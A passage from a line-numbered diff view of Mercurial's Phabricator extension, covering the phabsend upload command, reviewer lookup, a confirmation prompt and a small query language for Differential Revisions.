1052 raise error.Abort(_(b'cannot create revision for %s') % ctx)
1051
1053
1052 return revision, diff
1054 return revision, diff
1053
1055
1054
1056
1055 def userphids(ui, names):
1057 def userphids(ui, names):
1056 """convert user names to PHIDs"""
1058 """convert user names to PHIDs"""
1057 names = [name.lower() for name in names]
1059 names = [name.lower() for name in names]
1058 query = {b'constraints': {b'usernames': names}}
1060 query = {b'constraints': {b'usernames': names}}
1059 result = callconduit(ui, b'user.search', query)
1061 result = callconduit(ui, b'user.search', query)
1060 # username not found is not an error of the API. So check if we have missed
1062 # username not found is not an error of the API. So check if we have missed
1061 # some names here.
1063 # some names here.
1062 data = result[b'data']
1064 data = result[b'data']
1063 resolved = set(entry[b'fields'][b'username'].lower() for entry in data)
1065 resolved = set(entry[b'fields'][b'username'].lower() for entry in data)
1064 unresolved = set(names) - resolved
1066 unresolved = set(names) - resolved
1065 if unresolved:
1067 if unresolved:
1066 raise error.Abort(
1068 raise error.Abort(
1067 _(b'unknown username: %s') % b' '.join(sorted(unresolved))
1069 _(b'unknown username: %s') % b' '.join(sorted(unresolved))
1068 )
1070 )
1069 return [entry[b'phid'] for entry in data]
1071 return [entry[b'phid'] for entry in data]
1070
1072
1071
1073
1072 @vcrcommand(
1074 @vcrcommand(
1073 b'phabsend',
1075 b'phabsend',
1074 [
1076 [
1075 (b'r', b'rev', [], _(b'revisions to send'), _(b'REV')),
1077 (b'r', b'rev', [], _(b'revisions to send'), _(b'REV')),
1076 (b'', b'amend', True, _(b'update commit messages')),
1078 (b'', b'amend', True, _(b'update commit messages')),
1077 (b'', b'reviewer', [], _(b'specify reviewers')),
1079 (b'', b'reviewer', [], _(b'specify reviewers')),
1078 (b'', b'blocker', [], _(b'specify blocking reviewers')),
1080 (b'', b'blocker', [], _(b'specify blocking reviewers')),
1079 (
1081 (
1080 b'm',
1082 b'm',
1081 b'comment',
1083 b'comment',
1082 b'',
1084 b'',
1083 _(b'add a comment to Revisions with new/updated Diffs'),
1085 _(b'add a comment to Revisions with new/updated Diffs'),
1084 ),
1086 ),
1085 (b'', b'confirm', None, _(b'ask for confirmation before sending')),
1087 (b'', b'confirm', None, _(b'ask for confirmation before sending')),
1086 ],
1088 ],
1087 _(b'REV [OPTIONS]'),
1089 _(b'REV [OPTIONS]'),
1088 helpcategory=command.CATEGORY_IMPORT_EXPORT,
1090 helpcategory=command.CATEGORY_IMPORT_EXPORT,
1089 )
1091 )
1090 def phabsend(ui, repo, *revs, **opts):
1092 def phabsend(ui, repo, *revs, **opts):
1091 """upload changesets to Phabricator
1093 """upload changesets to Phabricator
1092
1094
1093 If there are multiple revisions specified, they will be send as a stack
1095 If there are multiple revisions specified, they will be send as a stack
1094 with a linear dependencies relationship using the order specified by the
1096 with a linear dependencies relationship using the order specified by the
1095 revset.
1097 revset.
1096
1098
1097 For the first time uploading changesets, local tags will be created to
1099 For the first time uploading changesets, local tags will be created to
1098 maintain the association. After the first time, phabsend will check
1100 maintain the association. After the first time, phabsend will check
1099 obsstore and tags information so it can figure out whether to update an
1101 obsstore and tags information so it can figure out whether to update an
1100 existing Differential Revision, or create a new one.
1102 existing Differential Revision, or create a new one.
1101
1103
1102 If --amend is set, update commit messages so they have the
1104 If --amend is set, update commit messages so they have the
1103 ``Differential Revision`` URL, remove related tags. This is similar to what
1105 ``Differential Revision`` URL, remove related tags. This is similar to what
1104 arcanist will do, and is more desired in author-push workflows. Otherwise,
1106 arcanist will do, and is more desired in author-push workflows. Otherwise,
1105 use local tags to record the ``Differential Revision`` association.
1107 use local tags to record the ``Differential Revision`` association.
1106
1108
1107 The --confirm option lets you confirm changesets before sending them. You
1109 The --confirm option lets you confirm changesets before sending them. You
1108 can also add following to your configuration file to make it default
1110 can also add following to your configuration file to make it default
1109 behaviour::
1111 behaviour::
1110
1112
1111 [phabsend]
1113 [phabsend]
1112 confirm = true
1114 confirm = true
1113
1115
1114 phabsend will check obsstore and the above association to decide whether to
1116 phabsend will check obsstore and the above association to decide whether to
1115 update an existing Differential Revision, or create a new one.
1117 update an existing Differential Revision, or create a new one.
1116 """
1118 """
1117 opts = pycompat.byteskwargs(opts)
1119 opts = pycompat.byteskwargs(opts)
1118 revs = list(revs) + opts.get(b'rev', [])
1120 revs = list(revs) + opts.get(b'rev', [])
1119 revs = scmutil.revrange(repo, revs)
1121 revs = scmutil.revrange(repo, revs)
1120 revs.sort() # ascending order to preserve topological parent/child in phab
1122 revs.sort() # ascending order to preserve topological parent/child in phab
1121
1123
1122 if not revs:
1124 if not revs:
1123 raise error.Abort(_(b'phabsend requires at least one changeset'))
1125 raise error.Abort(_(b'phabsend requires at least one changeset'))
1124 if opts.get(b'amend'):
1126 if opts.get(b'amend'):
1125 cmdutil.checkunfinished(repo)
1127 cmdutil.checkunfinished(repo)
1126
1128
1127 # {newnode: (oldnode, olddiff, olddrev}
1129 # {newnode: (oldnode, olddiff, olddrev}
1128 oldmap = getoldnodedrevmap(repo, [repo[r].node() for r in revs])
1130 oldmap = getoldnodedrevmap(repo, [repo[r].node() for r in revs])
1129
1131
1130 confirm = ui.configbool(b'phabsend', b'confirm')
1132 confirm = ui.configbool(b'phabsend', b'confirm')
1131 confirm |= bool(opts.get(b'confirm'))
1133 confirm |= bool(opts.get(b'confirm'))
1132 if confirm:
1134 if confirm:
1133 confirmed = _confirmbeforesend(repo, revs, oldmap)
1135 confirmed = _confirmbeforesend(repo, revs, oldmap)
1134 if not confirmed:
1136 if not confirmed:
1135 raise error.Abort(_(b'phabsend cancelled'))
1137 raise error.Abort(_(b'phabsend cancelled'))
1136
1138
1137 actions = []
1139 actions = []
1138 reviewers = opts.get(b'reviewer', [])
1140 reviewers = opts.get(b'reviewer', [])
1139 blockers = opts.get(b'blocker', [])
1141 blockers = opts.get(b'blocker', [])
1140 phids = []
1142 phids = []
1141 if reviewers:
1143 if reviewers:
1142 phids.extend(userphids(repo.ui, reviewers))
1144 phids.extend(userphids(repo.ui, reviewers))
1143 if blockers:
1145 if blockers:
1144 phids.extend(
1146 phids.extend(
1145 map(
1147 map(
1146 lambda phid: b'blocking(%s)' % phid,
1148 lambda phid: b'blocking(%s)' % phid,
1147 userphids(repo.ui, blockers),
1149 userphids(repo.ui, blockers),
1148 )
1150 )
1149 )
1151 )
1150 if phids:
1152 if phids:
1151 actions.append({b'type': b'reviewers.add', b'value': phids})
1153 actions.append({b'type': b'reviewers.add', b'value': phids})
1152
1154
1153 drevids = [] # [int]
1155 drevids = [] # [int]
1154 diffmap = {} # {newnode: diff}
1156 diffmap = {} # {newnode: diff}
1155
1157
1156 # Send patches one by one so we know their Differential Revision PHIDs and
1158 # Send patches one by one so we know their Differential Revision PHIDs and
1157 # can provide dependency relationship
1159 # can provide dependency relationship
1158 lastrevphid = None
1160 lastrevphid = None
1159 for rev in revs:
1161 for rev in revs:
1160 ui.debug(b'sending rev %d\n' % rev)
1162 ui.debug(b'sending rev %d\n' % rev)
1161 ctx = repo[rev]
1163 ctx = repo[rev]
1162
1164
1163 # Get Differential Revision ID
1165 # Get Differential Revision ID
1164 oldnode, olddiff, revid = oldmap.get(ctx.node(), (None, None, None))
1166 oldnode, olddiff, revid = oldmap.get(ctx.node(), (None, None, None))
1165 if oldnode != ctx.node() or opts.get(b'amend'):
1167 if oldnode != ctx.node() or opts.get(b'amend'):
1166 # Create or update Differential Revision
1168 # Create or update Differential Revision
1167 revision, diff = createdifferentialrevision(
1169 revision, diff = createdifferentialrevision(
1168 ctx,
1170 ctx,
1169 revid,
1171 revid,
1170 lastrevphid,
1172 lastrevphid,
1171 oldnode,
1173 oldnode,
1172 olddiff,
1174 olddiff,
1173 actions,
1175 actions,
1174 opts.get(b'comment'),
1176 opts.get(b'comment'),
1175 )
1177 )
1176 diffmap[ctx.node()] = diff
1178 diffmap[ctx.node()] = diff
1177 newrevid = int(revision[b'object'][b'id'])
1179 newrevid = int(revision[b'object'][b'id'])
1178 newrevphid = revision[b'object'][b'phid']
1180 newrevphid = revision[b'object'][b'phid']
1179 if revid:
1181 if revid:
1180 action = b'updated'
1182 action = b'updated'
1181 else:
1183 else:
1182 action = b'created'
1184 action = b'created'
1183
1185
1184 # Create a local tag to note the association, if commit message
1186 # Create a local tag to note the association, if commit message
1185 # does not have it already
1187 # does not have it already
1186 m = _differentialrevisiondescre.search(ctx.description())
1188 m = _differentialrevisiondescre.search(ctx.description())
1187 if not m or int(m.group('id')) != newrevid:
1189 if not m or int(m.group('id')) != newrevid:
1188 tagname = b'D%d' % newrevid
1190 tagname = b'D%d' % newrevid
1189 tags.tag(
1191 tags.tag(
1190 repo,
1192 repo,
1191 tagname,
1193 tagname,
1192 ctx.node(),
1194 ctx.node(),
1193 message=None,
1195 message=None,
1194 user=None,
1196 user=None,
1195 date=None,
1197 date=None,
1196 local=True,
1198 local=True,
1197 )
1199 )
1198 else:
1200 else:
1199 # Nothing changed. But still set "newrevphid" so the next revision
1201 # Nothing changed. But still set "newrevphid" so the next revision
1200 # could depend on this one and "newrevid" for the summary line.
1202 # could depend on this one and "newrevid" for the summary line.
1201 newrevphid = querydrev(repo.ui, b'%d' % revid)[0][b'phid']
1203 newrevphid = querydrev(repo.ui, b'%d' % revid)[0][b'phid']
1202 newrevid = revid
1204 newrevid = revid
1203 action = b'skipped'
1205 action = b'skipped'
1204
1206
1205 actiondesc = ui.label(
1207 actiondesc = ui.label(
1206 {
1208 {
1207 b'created': _(b'created'),
1209 b'created': _(b'created'),
1208 b'skipped': _(b'skipped'),
1210 b'skipped': _(b'skipped'),
1209 b'updated': _(b'updated'),
1211 b'updated': _(b'updated'),
1210 }[action],
1212 }[action],
1211 b'phabricator.action.%s' % action,
1213 b'phabricator.action.%s' % action,
1212 )
1214 )
1213 drevdesc = ui.label(b'D%d' % newrevid, b'phabricator.drev')
1215 drevdesc = ui.label(b'D%d' % newrevid, b'phabricator.drev')
1214 nodedesc = ui.label(bytes(ctx), b'phabricator.node')
1216 nodedesc = ui.label(bytes(ctx), b'phabricator.node')
1215 desc = ui.label(ctx.description().split(b'\n')[0], b'phabricator.desc')
1217 desc = ui.label(ctx.description().split(b'\n')[0], b'phabricator.desc')
1216 ui.write(
1218 ui.write(
1217 _(b'%s - %s - %s: %s\n') % (drevdesc, actiondesc, nodedesc, desc)
1219 _(b'%s - %s - %s: %s\n') % (drevdesc, actiondesc, nodedesc, desc)
1218 )
1220 )
1219 drevids.append(newrevid)
1221 drevids.append(newrevid)
1220 lastrevphid = newrevphid
1222 lastrevphid = newrevphid
1221
1223
1222 # Update commit messages and remove tags
1224 # Update commit messages and remove tags
1223 if opts.get(b'amend'):
1225 if opts.get(b'amend'):
1224 unfi = repo.unfiltered()
1226 unfi = repo.unfiltered()
1225 drevs = callconduit(ui, b'differential.query', {b'ids': drevids})
1227 drevs = callconduit(ui, b'differential.query', {b'ids': drevids})
1226 with repo.wlock(), repo.lock(), repo.transaction(b'phabsend'):
1228 with repo.wlock(), repo.lock(), repo.transaction(b'phabsend'):
1227 wnode = unfi[b'.'].node()
1229 wnode = unfi[b'.'].node()
1228 mapping = {} # {oldnode: [newnode]}
1230 mapping = {} # {oldnode: [newnode]}
1229 for i, rev in enumerate(revs):
1231 for i, rev in enumerate(revs):
1230 old = unfi[rev]
1232 old = unfi[rev]
1231 drevid = drevids[i]
1233 drevid = drevids[i]
1232 drev = [d for d in drevs if int(d[b'id']) == drevid][0]
1234 drev = [d for d in drevs if int(d[b'id']) == drevid][0]
1233 newdesc = getdescfromdrev(drev)
1235 newdesc = getdescfromdrev(drev)
1234 # Make sure commit message contain "Differential Revision"
1236 # Make sure commit message contain "Differential Revision"
1235 if old.description() != newdesc:
1237 if old.description() != newdesc:
1236 if old.phase() == phases.public:
1238 if old.phase() == phases.public:
1237 ui.warn(
1239 ui.warn(
1238 _(b"warning: not updating public commit %s\n")
1240 _(b"warning: not updating public commit %s\n")
1239 % scmutil.formatchangeid(old)
1241 % scmutil.formatchangeid(old)
1240 )
1242 )
1241 continue
1243 continue
1242 parents = [
1244 parents = [
1243 mapping.get(old.p1().node(), (old.p1(),))[0],
1245 mapping.get(old.p1().node(), (old.p1(),))[0],
1244 mapping.get(old.p2().node(), (old.p2(),))[0],
1246 mapping.get(old.p2().node(), (old.p2(),))[0],
1245 ]
1247 ]
1246 new = context.metadataonlyctx(
1248 new = context.metadataonlyctx(
1247 repo,
1249 repo,
1248 old,
1250 old,
1249 parents=parents,
1251 parents=parents,
1250 text=newdesc,
1252 text=newdesc,
1251 user=old.user(),
1253 user=old.user(),
1252 date=old.date(),
1254 date=old.date(),
1253 extra=old.extra(),
1255 extra=old.extra(),
1254 )
1256 )
1255
1257
1256 newnode = new.commit()
1258 newnode = new.commit()
1257
1259
1258 mapping[old.node()] = [newnode]
1260 mapping[old.node()] = [newnode]
1259 # Update diff property
1261 # Update diff property
1260 # If it fails just warn and keep going, otherwise the DREV
1262 # If it fails just warn and keep going, otherwise the DREV
1261 # associations will be lost
1263 # associations will be lost
1262 try:
1264 try:
1263 writediffproperties(unfi[newnode], diffmap[old.node()])
1265 writediffproperties(unfi[newnode], diffmap[old.node()])
1264 except util.urlerr.urlerror:
1266 except util.urlerr.urlerror:
1265 ui.warnnoi18n(
1267 ui.warnnoi18n(
1266 b'Failed to update metadata for D%d\n' % drevid
1268 b'Failed to update metadata for D%d\n' % drevid
1267 )
1269 )
1268 # Remove local tags since it's no longer necessary
1270 # Remove local tags since it's no longer necessary
1269 tagname = b'D%d' % drevid
1271 tagname = b'D%d' % drevid
1270 if tagname in repo.tags():
1272 if tagname in repo.tags():
1271 tags.tag(
1273 tags.tag(
1272 repo,
1274 repo,
1273 tagname,
1275 tagname,
1274 nullid,
1276 nullid,
1275 message=None,
1277 message=None,
1276 user=None,
1278 user=None,
1277 date=None,
1279 date=None,
1278 local=True,
1280 local=True,
1279 )
1281 )
1280 scmutil.cleanupnodes(repo, mapping, b'phabsend', fixphase=True)
1282 scmutil.cleanupnodes(repo, mapping, b'phabsend', fixphase=True)
1281 if wnode in mapping:
1283 if wnode in mapping:
1282 unfi.setparents(mapping[wnode][0])
1284 unfi.setparents(mapping[wnode][0])
1283
1285
1284
1286
1285 # Map from "hg:meta" keys to header understood by "hg import". The order is
1287 # Map from "hg:meta" keys to header understood by "hg import". The order is
1286 # consistent with "hg export" output.
1288 # consistent with "hg export" output.
1287 _metanamemap = util.sortdict(
1289 _metanamemap = util.sortdict(
1288 [
1290 [
1289 (b'user', b'User'),
1291 (b'user', b'User'),
1290 (b'date', b'Date'),
1292 (b'date', b'Date'),
1291 (b'branch', b'Branch'),
1293 (b'branch', b'Branch'),
1292 (b'node', b'Node ID'),
1294 (b'node', b'Node ID'),
1293 (b'parent', b'Parent '),
1295 (b'parent', b'Parent '),
1294 ]
1296 ]
1295 )
1297 )
1296
1298
1297
1299
1298 def _confirmbeforesend(repo, revs, oldmap):
1300 def _confirmbeforesend(repo, revs, oldmap):
1299 url, token = readurltoken(repo.ui)
1301 url, token = readurltoken(repo.ui)
1300 ui = repo.ui
1302 ui = repo.ui
1301 for rev in revs:
1303 for rev in revs:
1302 ctx = repo[rev]
1304 ctx = repo[rev]
1303 desc = ctx.description().splitlines()[0]
1305 desc = ctx.description().splitlines()[0]
1304 oldnode, olddiff, drevid = oldmap.get(ctx.node(), (None, None, None))
1306 oldnode, olddiff, drevid = oldmap.get(ctx.node(), (None, None, None))
1305 if drevid:
1307 if drevid:
1306 drevdesc = ui.label(b'D%d' % drevid, b'phabricator.drev')
1308 drevdesc = ui.label(b'D%d' % drevid, b'phabricator.drev')
1307 else:
1309 else:
1308 drevdesc = ui.label(_(b'NEW'), b'phabricator.drev')
1310 drevdesc = ui.label(_(b'NEW'), b'phabricator.drev')
1309
1311
1310 ui.write(
1312 ui.write(
1311 _(b'%s - %s: %s\n')
1313 _(b'%s - %s: %s\n')
1312 % (
1314 % (
1313 drevdesc,
1315 drevdesc,
1314 ui.label(bytes(ctx), b'phabricator.node'),
1316 ui.label(bytes(ctx), b'phabricator.node'),
1315 ui.label(desc, b'phabricator.desc'),
1317 ui.label(desc, b'phabricator.desc'),
1316 )
1318 )
1317 )
1319 )
1318
1320
1319 if ui.promptchoice(
1321 if ui.promptchoice(
1320 _(b'Send the above changes to %s (yn)?$$ &Yes $$ &No') % url
1322 _(b'Send the above changes to %s (yn)?$$ &Yes $$ &No') % url
1321 ):
1323 ):
1322 return False
1324 return False
1323
1325
1324 return True
1326 return True
1325
1327
1326
1328
1327 _knownstatusnames = {
1329 _knownstatusnames = {
1328 b'accepted',
1330 b'accepted',
1329 b'needsreview',
1331 b'needsreview',
1330 b'needsrevision',
1332 b'needsrevision',
1331 b'closed',
1333 b'closed',
1332 b'abandoned',
1334 b'abandoned',
1333 b'changesplanned',
1335 b'changesplanned',
1334 }
1336 }
1335
1337
1336
1338
1337 def _getstatusname(drev):
1339 def _getstatusname(drev):
1338 """get normalized status name from a Differential Revision"""
1340 """get normalized status name from a Differential Revision"""
1339 return drev[b'statusName'].replace(b' ', b'').lower()
1341 return drev[b'statusName'].replace(b' ', b'').lower()
1340
1342
1341
1343
1342 # Small language to specify differential revisions. Support symbols: (), :X,
1344 # Small language to specify differential revisions. Support symbols: (), :X,
1343 # +, and -.
1345 # +, and -.
1344
1346
1345 _elements = {
1347 _elements = {
1346 # token-type: binding-strength, primary, prefix, infix, suffix
1348 # token-type: binding-strength, primary, prefix, infix, suffix
1347 b'(': (12, None, (b'group', 1, b')'), None, None),
1349 b'(': (12, None, (b'group', 1, b')'), None, None),
1348 b':': (8, None, (b'ancestors', 8), None, None),
1350 b':': (8, None, (b'ancestors', 8), None, None),
1349 b'&': (5, None, None, (b'and_', 5), None),
1351 b'&': (5, None, None, (b'and_', 5), None),
1350 b'+': (4, None, None, (b'add', 4), None),
1352 b'+': (4, None, None, (b'add', 4), None),
1351 b'-': (4, None, None, (b'sub', 4), None),
1353 b'-': (4, None, None, (b'sub', 4), None),
1352 b')': (0, None, None, None, None),
1354 b')': (0, None, None, None, None),
1353 b'symbol': (0, b'symbol', None, None, None),
1355 b'symbol': (0, b'symbol', None, None, None),
1354 b'end': (0, None, None, None, None),
1356 b'end': (0, None, None, None, None),
1355 }
1357 }
1356
1358
1357
1359
1358 def _tokenize(text):
1360 def _tokenize(text):
1359 view = memoryview(text) # zero-copy slice
1361 view = memoryview(text) # zero-copy slice
1360 special = b'():+-& '
1362 special = b'():+-& '
1361 pos = 0
1363 pos = 0
1362 length = len(text)
1364 length = len(text)
1363 while pos < length:
1365 while pos < length:
1364 symbol = b''.join(
1366 symbol = b''.join(
1365 itertools.takewhile(
1367 itertools.takewhile(
1366 lambda ch: ch not in special, pycompat.iterbytestr(view[pos:])
1368 lambda ch: ch not in special, pycompat.iterbytestr(view[pos:])
1367 )
1369 )
1368 )
1370 )
1369 if symbol:
1371 if symbol:
1370 yield (b'symbol', symbol, pos)
1372 yield (b'symbol', symbol, pos)
1371 pos += len(symbol)
1373 pos += len(symbol)
1372 else: # special char, ignore space
1374 else: # special char, ignore space
1373 if text[pos : pos + 1] != b' ':
1375 if text[pos : pos + 1] != b' ':
1374 yield (text[pos : pos + 1], None, pos)
1376 yield (text[pos : pos + 1], None, pos)
1375 pos += 1
1377 pos += 1
1376 yield (b'end', None, pos)
1378 yield (b'end', None, pos)
1377
1379
1378
1380
1379 def _parse(text):
1381 def _parse(text):
1380 tree, pos = parser.parser(_elements).parse(_tokenize(text))
1382 tree, pos = parser.parser(_elements).parse(_tokenize(text))
1381 if pos != len(text):
1383 if pos != len(text):
1382 raise error.ParseError(b'invalid token', pos)
1384 raise error.ParseError(b'invalid token', pos)
1383 return tree
1385 return tree
1384
1386
1385
1387
1386 def _parsedrev(symbol):
1388 def _parsedrev(symbol):
1387 """str -> int or None, ex. 'D45' -> 45; '12' -> 12; 'x' -> None"""
1389 """str -> int or None, ex. 'D45' -> 45; '12' -> 12; 'x' -> None"""
1388 if symbol.startswith(b'D') and symbol[1:].isdigit():
1390 if symbol.startswith(b'D') and symbol[1:].isdigit():
1389 return int(symbol[1:])
1391 return int(symbol[1:])
1390 if symbol.isdigit():
1392 if symbol.isdigit():
1391 return int(symbol)
1393 return int(symbol)
1392
1394
1393
1395
1394 def _prefetchdrevs(tree):
1396 def _prefetchdrevs(tree):
1395 """return ({single-drev-id}, {ancestor-drev-id}) to prefetch"""
1397 """return ({single-drev-id}, {ancestor-drev-id}) to prefetch"""
1396 drevs = set()
1398 drevs = set()
1397 ancestordrevs = set()
1399 ancestordrevs = set()
1398 op = tree[0]
1400 op = tree[0]
1399 if op == b'symbol':
1401 if op == b'symbol':
1400 r = _parsedrev(tree[1])
1402 r = _parsedrev(tree[1])
1401 if r:
1403 if r:
1402 drevs.add(r)
1404 drevs.add(r)
1403 elif op == b'ancestors':
1405 elif op == b'ancestors':
1404 r, a = _prefetchdrevs(tree[1])
1406 r, a = _prefetchdrevs(tree[1])
1405 drevs.update(r)
1407 drevs.update(r)
1406 ancestordrevs.update(r)
1408 ancestordrevs.update(r)
1407 ancestordrevs.update(a)
1409 ancestordrevs.update(a)
1408 else:
1410 else:
1409 for t in tree[1:]:
1411 for t in tree[1:]:
1410 r, a = _prefetchdrevs(t)
1412 r, a = _prefetchdrevs(t)
1411 drevs.update(r)
1413 drevs.update(r)
1412 ancestordrevs.update(a)
1414 ancestordrevs.update(a)
1413 return drevs, ancestordrevs
1415 return drevs, ancestordrevs
1414
1416
1415
1417
1416 def querydrev(ui, spec):
1418 def querydrev(ui, spec):
1417 """return a list of "Differential Revision" dicts
1419 """return a list of "Differential Revision" dicts
1418
1420
1419 spec is a string using a simple query language, see docstring in phabread
1421 spec is a string using a simple query language, see docstring in phabread
1420 for details.
1422 for details.
1421
1423
1422 A "Differential Revision dict" looks like:
1424 A "Differential Revision dict" looks like:
1423
1425
1424 {
1426 {
1425 "activeDiffPHID": "PHID-DIFF-xoqnjkobbm6k4dk6hi72",
1427 "activeDiffPHID": "PHID-DIFF-xoqnjkobbm6k4dk6hi72",
1426 "authorPHID": "PHID-USER-tv3ohwc4v4jeu34otlye",
1428 "authorPHID": "PHID-USER-tv3ohwc4v4jeu34otlye",
1427 "auxiliary": {
1429 "auxiliary": {
1428 "phabricator:depends-on": [
1430 "phabricator:depends-on": [
1429 "PHID-DREV-gbapp366kutjebt7agcd"
1431 "PHID-DREV-gbapp366kutjebt7agcd"
1430 ]
1432 ]
1431 "phabricator:projects": [],
1433 "phabricator:projects": [],
1432 },
1434 },
1433 "branch": "default",
1435 "branch": "default",
1434 "ccs": [],
1436 "ccs": [],
1435 "commits": [],
1437 "commits": [],
1436 "dateCreated": "1499181406",
1438 "dateCreated": "1499181406",
1437 "dateModified": "1499182103",
1439 "dateModified": "1499182103",
1438 "diffs": [
1440 "diffs": [
1439 "3",
1441 "3",
1440 "4",
1442 "4",
1441 ],
1443 ],
1442 "hashes": [],
1444 "hashes": [],
1443 "id": "2",
1445 "id": "2",
1444 "lineCount": "2",
1446 "lineCount": "2",
1445 "phid": "PHID-DREV-672qvysjcczopag46qty",
1447 "phid": "PHID-DREV-672qvysjcczopag46qty",
1446 "properties": {},
1448 "properties": {},
1447 "repositoryPHID": "PHID-REPO-hub2hx62ieuqeheznasv",
1449 "repositoryPHID": "PHID-REPO-hub2hx62ieuqeheznasv",
1448 "reviewers": [],
1450 "reviewers": [],
1449 "sourcePath": null
1451 "sourcePath": null
1450 "status": "0",
1452 "status": "0",
1451 "statusName": "Needs Review",
1453 "statusName": "Needs Review",
1452 "summary": "",
1454 "summary": "",
1453 "testPlan": "",
1455 "testPlan": "",
1454 "title": "example",
1456 "title": "example",
1455 "uri": "https://phab.example.com/D2",
1457 "uri": "https://phab.example.com/D2",
1456 }
1458 }
1457 """
1459 """
1458 # TODO: replace differential.query and differential.querydiffs with
1460 # TODO: replace differential.query and differential.querydiffs with
1459 # differential.diff.search because the former (and their output) are
1461 # differential.diff.search because the former (and their output) are
1460 # frozen, and planned to be deprecated and removed.
1462 # frozen, and planned to be deprecated and removed.
1461
1463
1462 def fetch(params):
1464 def fetch(params):
1463 """params -> single drev or None"""
1465 """params -> single drev or None"""
1464 key = (params.get(b'ids') or params.get(b'phids') or [None])[0]
1466 key = (params.get(b'ids') or params.get(b'phids') or [None])[0]
1465 if key in prefetched:
1467 if key in prefetched:
1466 return prefetched[key]
1468 return prefetched[key]
1467 drevs = callconduit(ui, b'differential.query', params)
1469 drevs = callconduit(ui, b'differential.query', params)
1468 # Fill prefetched with the result
1470 # Fill prefetched with the result
1469 for drev in drevs:
1471 for drev in drevs:
1470 prefetched[drev[b'phid']] = drev
1472 prefetched[drev[b'phid']] = drev
1471 prefetched[int(drev[b'id'])] = drev
1473 prefetched[int(drev[b'id'])] = drev
1472 if key not in prefetched:
1474 if key not in prefetched:
1473 raise error.Abort(
1475 raise error.Abort(
1474 _(b'cannot get Differential Revision %r') % params
1476 _(b'cannot get Differential Revision %r') % params
1475 )
1477 )
1476 return prefetched[key]
1478 return prefetched[key]
1477
1479
1478 def getstack(topdrevids):
1480 def getstack(topdrevids):
1479 """given a top, get a stack from the bottom, [id] -> [id]"""
1481 """given a top, get a stack from the bottom, [id] -> [id]"""
1480 visited = set()
1482 visited = set()
1481 result = []
1483 result = []
1482 queue = [{b'ids': [i]} for i in topdrevids]
1484 queue = [{b'ids': [i]} for i in topdrevids]
1483 while queue:
1485 while queue:
1484 params = queue.pop()
1486 params = queue.pop()
1485 drev = fetch(params)
1487 drev = fetch(params)
1486 if drev[b'id'] in visited:
1488 if drev[b'id'] in visited:
1487 continue
1489 continue
1488 visited.add(drev[b'id'])
1490 visited.add(drev[b'id'])
1489 result.append(int(drev[b'id']))
1491 result.append(int(drev[b'id']))
1490 auxiliary = drev.get(b'auxiliary', {})
1492 auxiliary = drev.get(b'auxiliary', {})
1491 depends = auxiliary.get(b'phabricator:depends-on', [])
1493 depends = auxiliary.get(b'phabricator:depends-on', [])
1492 for phid in depends:
1494 for phid in depends:
1493 queue.append({b'phids': [phid]})
1495 queue.append({b'phids': [phid]})
1494 result.reverse()
1496 result.reverse()
1495 return smartset.baseset(result)
1497 return smartset.baseset(result)
1496
1498
1497 # Initialize prefetch cache
1499 # Initialize prefetch cache
1498 prefetched = {} # {id or phid: drev}
1500 prefetched = {} # {id or phid: drev}
1499
1501
1500 tree = _parse(spec)
1502 tree = _parse(spec)
1501 drevs, ancestordrevs = _prefetchdrevs(tree)
1503 drevs, ancestordrevs = _prefetchdrevs(tree)
1502
1504
1503 # developer config: phabricator.batchsize
1505 # developer config: phabricator.batchsize
1504 batchsize = ui.configint(b'phabricator', b'batchsize')
1506 batchsize = ui.configint(b'phabricator', b'batchsize')
1505
1507
1506 # Prefetch Differential Revisions in batch
1508 # Prefetch Differential Revisions in batch
1507 tofetch = set(drevs)
1509 tofetch = set(drevs)
1508 for r in ancestordrevs:
1510 for r in ancestordrevs:
1509 tofetch.update(range(max(1, r - batchsize), r + 1))
1511 tofetch.update(range(max(1, r - batchsize), r + 1))
1510 if drevs:
1512 if drevs:
1511 fetch({b'ids': list(tofetch)})
1513 fetch({b'ids': list(tofetch)})
1512 validids = sorted(set(getstack(list(ancestordrevs))) | set(drevs))
1514 validids = sorted(set(getstack(list(ancestordrevs))) | set(drevs))
1513
1515
1514 # Walk through the tree, return smartsets
1516 # Walk through the tree, return smartsets
1515 def walk(tree):
1517 def walk(tree):
1516 op = tree[0]
1518 op = tree[0]
1517 if op == b'symbol':
1519 if op == b'symbol':
1518 drev = _parsedrev(tree[1])
1520 drev = _parsedrev(tree[1])
1519 if drev:
1521 if drev:
1520 return smartset.baseset([drev])
1522 return smartset.baseset([drev])
1521 elif tree[1] in _knownstatusnames:
1523 elif tree[1] in _knownstatusnames:
1522 drevs = [
1524 drevs = [
1523 r
1525 r
1524 for r in validids
1526 for r in validids
1525 if _getstatusname(prefetched[r]) == tree[1]
1527 if _getstatusname(prefetched[r]) == tree[1]
1526 ]
1528 ]
1527 return smartset.baseset(drevs)
1529 return smartset.baseset(drevs)
1528 else:
1530 else:
1529 raise error.Abort(_(b'unknown symbol: %s') % tree[1])
1531 raise error.Abort(_(b'unknown symbol: %s') % tree[1])
1530 elif op in {b'and_', b'add', b'sub'}:
1532 elif op in {b'and_', b'add', b'sub'}:
1531 assert len(tree) == 3
1533 assert len(tree) == 3
1532 return getattr(operator, op)(walk(tree[1]), walk(tree[2]))
1534 return getattr(operator, op)(walk(tree[1]), walk(tree[2]))
1533 elif op == b'group':
1535 elif op == b'group':
1534 return walk(tree[1])
1536 return walk(tree[1])
1535 elif op == b'ancestors':
1537 elif op == b'ancestors':
1536 return getstack(walk(tree[1]))
1538 return getstack(walk(tree[1]))
1537 else:
1539 else:
1538 raise error.ProgrammingError(b'illegal tree: %r' % tree)
1540 raise error.ProgrammingError(b'illegal tree: %r' % tree)
1539
1541
1540 return [prefetched[r] for r in walk(tree)]
1542 return [prefetched[r] for r in walk(tree)]
1541
1543
1542
1544
1543 def getdescfromdrev(drev):
1545 def getdescfromdrev(drev):
1544 """get description (commit message) from "Differential Revision"
1546 """get description (commit message) from "Differential Revision"
1545
1547
1546 This is similar to differential.getcommitmessage API. But we only care
1548 This is similar to differential.getcommitmessage API. But we only care
1547 about limited fields: title, summary, test plan, and URL.
1549 about limited fields: title, summary, test plan, and URL.
1548 """
1550 """
1549 title = drev[b'title']
1551 title = drev[b'title']
1550 summary = drev[b'summary'].rstrip()
1552 summary = drev[b'summary'].rstrip()
1551 testplan = drev[b'testPlan'].rstrip()
1553 testplan = drev[b'testPlan'].rstrip()
1552 if testplan:
1554 if testplan:
1553 testplan = b'Test Plan:\n%s' % testplan
1555 testplan = b'Test Plan:\n%s' % testplan
